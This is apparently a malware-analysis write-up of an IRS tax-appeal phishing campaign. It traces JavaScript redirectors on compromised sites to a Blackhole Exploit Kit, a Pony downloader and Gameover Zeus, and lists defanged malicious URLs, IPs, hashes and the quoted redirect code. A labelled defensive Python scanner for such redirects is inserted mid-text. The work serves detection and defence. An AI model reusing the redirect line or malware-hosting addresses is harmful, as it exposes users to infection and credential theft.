IRS – Your tax appeal is rejected.

Subject: Your tax appeak is rejected.
URL: hxxp://morningdeals[.]net/ZseUkSLa/index.html

Your tax appeal is rejected.

The text ‘Online Tax Appeal’ in the email is hyperlinked to the URL shown above. That page has no visible content; it only loads four JavaScript files:

badigames[.]net /YRQnqzee/js.js
hermandaddepasion[.]com /63x21NoX/js.js
http://www.techhome.rmutk.ac[.]th /8vVWAm9s/js.js
http://www.trakter4u[.]gr /dLYd6p1U/js.js

These JavaScript redirectors contain the following document.location assignment, which sends victims to a Blackhole Exploit Kit landing page hosted at 207.210.65.109:

document.location='hxxp://tradercircuit[.]com/showthread.php?t=73a07bcb51f4be71';
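As an added defender-side example (not code from the original post), here is a small Python scanner that refangs a js.js redirector of the kind quoted above, pulls out its document.location target, and flags it when it leaves the hosting site or matches the showthread.php?t=<hex> landing-page pattern. The sample script and the hosting domain passed in are constructed for the demonstration.

```python
import re
from urllib.parse import urlparse

# Constructed sample of a js.js redirector, written in the write-up's defanged
# style (hxxp, [.]) so it can be pasted from a report without re-arming it.
SAMPLE_JS = """
var a = 'x';
document.location='hxxp://tradercircuit[.]com/showthread.php?t=73a07bcb51f4be71';
"""

# document.location / window.location (optionally .href) assigned a quoted string
REDIRECT_RE = re.compile(
    r"""(?:document|window)\.location(?:\.href)?\s*=\s*(['"])(?P<url>[^'"]+)\1""",
    re.IGNORECASE,
)
# Landing-page pattern used by the Blackhole kit in this campaign: showthread.php?t=<16 hex>
BLACKHOLE_RE = re.compile(r"/showthread\.php\?t=[0-9a-f]{16}(?:$|&)", re.IGNORECASE)


def refang(s):
    """Turn report-style defanged indicators back into parseable URLs."""
    return s.replace("hxxp://", "http://").replace("hxxps://", "https://").replace("[.]", ".")


def extract_redirects(js_text):
    """Return every URL the script assigns to document/window.location."""
    return [m.group("url") for m in REDIRECT_RE.finditer(js_text)]


def classify_redirect(url, hosting_domain):
    """Describe one redirect target: its host, whether it leaves the hosting site,
    and whether it matches the Blackhole landing-page pattern."""
    url = refang(url)
    host = (urlparse(url).hostname or "").lower()
    return {
        "url": url,
        "host": host,
        "offsite": bool(host) and host != hosting_domain.lower(),
        "blackhole_like": BLACKHOLE_RE.search(url) is not None,
    }


def scan_script(js_text, hosting_domain):
    """Scan one fetched script and return the classified redirects it contains."""
    return [classify_redirect(u, hosting_domain) for u in extract_redirects(js_text)]


if __name__ == "__main__":
    for hit in scan_script(SAMPLE_JS, "badigames.net"):
        print(hit)
```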

The exploit kit first downloaded a Pony downloader from the following location:

tradercircuit[.]com /q.php?f=e4a98&e=2

File: info.exe
MD5: 623d391863770fd11a51f564a655cfc0
Size: 95,392 bytes

This Pony downloader variant was also configured to download Gameover Zeus binaries from the following locations:

layout.cnt[.]br /3ZD7ArbR/rnzj80FK.exe —> hosted at IP address 187.45.216.36
kucukagaanaokulu.k12[.]tr /5hxYiCGM/DLsp9.exe —> hosted at IP address 94.102.1.94
beyondcreativehm[.]com /MnFUS9Ah/PVzKLHf.exe —> hosted at IP address 69.89.31.99

All three files were identical, with the following properties:

File: rnzj80FK.exe/DLsp9.exe/PVzKLHf.exe
MD5: 4bf9cca55ff576e91c1fd4a2c2d35ff1
Size: 278,528 bytes
Other: This file is digitally signed by '66666666'
Company Name: 2q3wet Corporation
File Description: Windows TaskManager
Internal Name: taskmgr
Legal Copyright: Copyright (C) 2q3wet Corp. 1991-1999
Original Filename: taskmgr.exe

This Gameover variant was detected by 4 of 43 AV vendors on VirusTotal.com. It posts to a dropzone at 78.229.28.1 over port 28598, and its CID was "3004".
